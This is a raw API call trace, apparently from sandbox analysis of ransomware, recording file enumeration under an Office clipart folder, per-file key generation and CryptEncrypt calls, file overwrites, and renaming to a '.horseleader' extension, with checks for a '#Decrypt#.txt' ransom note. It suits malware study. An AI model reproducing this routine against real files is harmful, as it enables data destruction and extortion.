lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbde25400, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbde25400, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x1498, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00269_.WMF", cAlternateFileName="")) returned 1 [0253.505] lstrcmpiW 
(lpString1="BL00269_.WMF", lpString2="Windows") returned -1 [0253.505] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 67 [0253.505] StrStrIW (lpFirst="BL00269_.WMF", lpSrch=".horseleader") returned 0x0 [0253.505] lstrcmpW (lpString1="BL00269_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.505] lstrcmpW (lpString1="BL00269_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.505] lstrlenW (lpString=".testttjffg") returned 11 [0253.506] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.506] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.506] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.506] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.507] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 67 [0253.507] StrStrW (lpFirst="BL00269_.WMF", lpSrch=".txt") returned 0x0 [0253.507] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5272) returned 1 [0253.507] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1498, lpOverlapped=0x0) returned 1 [0253.509] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffeb68, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.509] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1498, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1498, lpOverlapped=0x0) returned 1 [0253.509] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.509] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.509] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.510] CloseHandle (hObject=0x158) returned 1 [0253.510] GetProcessHeap () returned 0x780000 [0253.510] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.510] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF.horseleader") returned 79 [0253.510] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf.horseleader")) returned 1 [0253.512] GetProcessHeap () returned 0x780000 [0253.512] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.512] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d095f00, ftCreationTime.dwHighDateTime=0x1bd4b18, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4d095f00, ftLastWriteTime.dwHighDateTime=0x1bd4b18, nFileSizeHigh=0x0, nFileSizeLow=0xbc8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00270_.WMF", cAlternateFileName="")) returned 1 [0253.512] lstrcmpiW (lpString1="BL00270_.WMF", lpString2="Windows") returned -1 [0253.512] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 67 [0253.512] StrStrIW (lpFirst="BL00270_.WMF", lpSrch=".horseleader") returned 0x0 [0253.512] lstrcmpW (lpString1="BL00270_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.512] lstrcmpW (lpString1="BL00270_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.512] lstrlenW (lpString=".testttjffg") returned 11 [0253.512] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.512] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.512] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.512] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.513] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 67 [0253.513] StrStrW 
(lpFirst="BL00270_.WMF", lpSrch=".txt") returned 0x0 [0253.513] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3016) returned 1 [0253.513] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xbc8, lpOverlapped=0x0) returned 1 [0253.515] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff438, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.515] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xbc8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xbc8, lpOverlapped=0x0) returned 1 [0253.515] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.516] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.516] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.516] CloseHandle (hObject=0x158) returned 1 [0253.516] GetProcessHeap () returned 0x780000 [0253.516] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.516] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF.horseleader") returned 79 [0253.516] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf"), 
lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf.horseleader")) returned 1 [0253.517] GetProcessHeap () returned 0x780000 [0253.517] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.517] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd2a9800, ftCreationTime.dwHighDateTime=0x1bd4b17, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfd2a9800, ftLastWriteTime.dwHighDateTime=0x1bd4b17, nFileSizeHigh=0x0, nFileSizeLow=0xec4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00273_.WMF", cAlternateFileName="")) returned 1 [0253.517] lstrcmpiW (lpString1="BL00273_.WMF", lpString2="Windows") returned -1 [0253.517] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 67 [0253.517] StrStrIW (lpFirst="BL00273_.WMF", lpSrch=".horseleader") returned 0x0 [0253.517] lstrcmpW (lpString1="BL00273_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.517] lstrcmpW (lpString1="BL00273_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.517] lstrlenW (lpString=".testttjffg") returned 11 [0253.517] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.517] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.517] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.517] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.518] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 67 [0253.518] StrStrW (lpFirst="BL00273_.WMF", lpSrch=".txt") returned 0x0 [0253.518] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3780) returned 1 [0253.518] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xec4, lpOverlapped=0x0) returned 1 [0253.519] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff13c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.519] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xec4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xec4, lpOverlapped=0x0) returned 1 [0253.520] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.520] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.520] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.520] CloseHandle (hObject=0x158) returned 1 [0253.520] GetProcessHeap () returned 0x780000 [0253.520] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7dc820 [0253.520] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF.horseleader") returned 79 [0253.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf.horseleader")) returned 1 [0253.523] GetProcessHeap () returned 0x780000 [0253.523] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.523] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9e80900, ftCreationTime.dwHighDateTime=0x1bd4b17, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc9e80900, ftLastWriteTime.dwHighDateTime=0x1bd4b17, nFileSizeHigh=0x0, nFileSizeLow=0x1044, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00274_.WMF", cAlternateFileName="")) returned 1 [0253.523] lstrcmpiW (lpString1="BL00274_.WMF", lpString2="Windows") returned -1 [0253.523] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 67 [0253.523] StrStrIW (lpFirst="BL00274_.WMF", lpSrch=".horseleader") returned 0x0 [0253.523] lstrcmpW (lpString1="BL00274_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.523] lstrcmpW (lpString1="BL00274_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.523] lstrlenW (lpString=".testttjffg") returned 11 [0253.523] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\BL00274_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.523] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.523] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.523] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.524] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 67 [0253.524] StrStrW (lpFirst="BL00274_.WMF", lpSrch=".txt") returned 0x0 [0253.524] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4164) returned 1 [0253.524] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1044, lpOverlapped=0x0) returned 1 [0253.526] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffefbc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.526] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1044, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1044, lpOverlapped=0x0) returned 1 [0253.527] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.527] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.527] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.527] CloseHandle (hObject=0x158) returned 1 [0253.527] GetProcessHeap () returned 0x780000 [0253.527] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.527] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF.horseleader") returned 79 [0253.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf.horseleader")) returned 1 [0253.528] GetProcessHeap () returned 0x780000 [0253.528] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.528] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac309900, ftCreationTime.dwHighDateTime=0x1bd4b43, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xac309900, ftLastWriteTime.dwHighDateTime=0x1bd4b43, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00296_.WMF", cAlternateFileName="")) returned 1 [0253.528] lstrcmpiW (lpString1="BL00296_.WMF", lpString2="Windows") returned -1 [0253.528] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program 
Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 67 [0253.528] StrStrIW (lpFirst="BL00296_.WMF", lpSrch=".horseleader") returned 0x0 [0253.528] lstrcmpW (lpString1="BL00296_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.528] lstrcmpW (lpString1="BL00296_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.528] lstrlenW (lpString=".testttjffg") returned 11 [0253.529] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.529] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.529] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.529] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.529] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 67 [0253.529] StrStrW (lpFirst="BL00296_.WMF", lpSrch=".txt") returned 0x0 [0253.529] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=812) returned 1 [0253.529] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x32c, lpOverlapped=0x0) returned 1 [0253.531] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffcd4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.532] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x32c, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x32c, lpOverlapped=0x0) returned 1 [0253.532] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.532] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.532] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.532] CloseHandle (hObject=0x158) returned 1 [0253.532] GetProcessHeap () returned 0x780000 [0253.532] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.532] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF.horseleader") returned 79 [0253.532] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf.horseleader")) returned 1 [0253.533] GetProcessHeap () returned 0x780000 [0253.534] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.534] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf533800, ftCreationTime.dwHighDateTime=0x1bd4b03, ftLastAccessTime.dwLowDateTime=0x519ef6b0, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdf533800, ftLastWriteTime.dwHighDateTime=0x1bd4b03, nFileSizeHigh=0x0, nFileSizeLow=0x332e, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00390_.WMF", cAlternateFileName="")) returned 1 [0253.534] lstrcmpiW (lpString1="BL00390_.WMF", lpString2="Windows") returned -1 [0253.534] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 67 [0253.534] StrStrIW (lpFirst="BL00390_.WMF", lpSrch=".horseleader") returned 0x0 [0253.534] lstrcmpW (lpString1="BL00390_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.534] lstrcmpW (lpString1="BL00390_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.534] lstrlenW (lpString=".testttjffg") returned 11 [0253.534] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.534] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.534] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.534] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.536] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 67 [0253.536] StrStrW (lpFirst="BL00390_.WMF", lpSrch=".txt") returned 0x0 [0253.536] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=13102) returned 1 [0253.536] ReadFile (in: 
